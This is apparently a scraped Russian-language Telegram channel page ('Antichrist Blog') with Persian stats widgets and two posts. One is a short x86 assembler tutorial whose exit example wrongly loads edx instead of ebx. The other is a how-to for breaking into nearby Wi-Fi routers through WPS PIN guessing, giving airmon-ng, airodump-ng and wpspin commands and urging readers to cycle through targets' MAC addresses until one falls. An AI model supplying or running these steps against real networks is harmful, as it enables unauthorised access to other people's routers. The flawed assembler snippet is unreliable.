434
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
اطلاعاتی وجود ندارد30 روز
- مشترکین
- پوشش پست
- ER - نسبت تعامل
در حال بارگیری داده...
معدل نمو المشتركين
در حال بارگیری داده...
Wassup, сегодня познакомимся с Assembler ❤️
Assembler — язык программирования низкого уровня, представляющий собой формат записи машинных команд, удобный для восприятия человеком. Ассемблер – чрезвычайно гибкий язык, позволяющий максимально использовать ресурсы операционной системы и компьютера, например многие изъяны безопасности проявляются только на уровне машинного кода и могут быть устранены только с этого уровня.
Инструкции ассемблера для процессора x86 могут иметь один, два, три операнда или не иметь их вообще. Операндами выступают численные значения, адреса памяти или регистры процессора. В качестве операндов используются регистры ebx, edx, esi, ecx и другие, mov копирует значение из одного операнда в другой.
Инструкция int 0x80 — это системный вызов на базе первых четырех регистров, регистр eax указывает, какой именно вызов следует осуществить, в то время как в регистрах ebx, ecx содержатся его первый, второй и третий аргументы (задаются инструкцией mov).
Рассмотрим print.asm, для вывода мы использовали функцию write ( SYSCALL: write(1, msg, 50) ) , в неё помещается eax номер системного вызова 4. После помещаем значение 1 в ebx. Помещаем в регистр ecx помещаем адрес нашей строки в сегменте данных, и указываем длину байта (mov edx, 50). Завершаем программу вызовом функции exit SYSCALL: exit(0)
с аргументом 0, потом помещаем в eax номер системного вызова этой функции — 1, а значение аргумента в ebx:
mov eax, 1
mov edx, 0
int 0x80
Теперь нам надо перевести код в бинарный файл, давайте поставим nasm:
apt -y install nasm
Получаем объектный файл формата ELF:
nasm -f elf64 print.asm -o print.o
Превращаем его в исполняемый двоичный файл a.out:
ld print.o
./a.out (print.asm):
Antichrist Blog
./a.out (input.asm):
Input: 666
Printing: 666
Это вам не print("Antichrist Blog")
в python, также я оставил ещё одну программу (input.asm)1 06100
Wassup, сегодня будем ломать Wi-Fi за 5 минут с помощью python!
В чём суть? Старые роутеры генерируют PIN CODE на основе MAC адреса, именно эту уязвимость мы и будем эксплуатировать. Плюсы, нам надо перебрать всего десяток пин-кодов, а не сотни тысяч. Минусы, роутеры могут быть обновлены!
Буду рассматривать два варианта;
Первый с Kali Linux:
pip3 install wpspin
airmon-ng start wlan0
airodump-ng wlan0 или airodump-ng wlan0mon
Нажимаем CTRL + Z, все точки доступа на ладони. Нам нужен лишь MAC-адрес точки которую мы хотим атаковать, не забудьте посмотреть включен ли у неё WPS. Запускаем софт указывая MAC, сетевую карту, таймаут;
python3 hack.py 00:00:00:00:00:00 wlan0 20
Далее просто меняем MAC и ждём когда взломаем какой-то из роутеров!
Второй вариант (для termux-хакеров):
apt update && apt -y install python
pip install wpspin
wpspin -A MAC-адрес
Чтобы сделать такое на Android, простые программы WPS есть которые подключатся по листу пин-кодов.
ВАЖНО! Не каждый роутер уязвим, но много Wi-Fi которые можно взломать. Во круг меня более 20 Wi-Fi точек, и 14 из них с WPS. Каждый 3 роутер может быть уязвим.Antichrist Blog
📡❤️
97830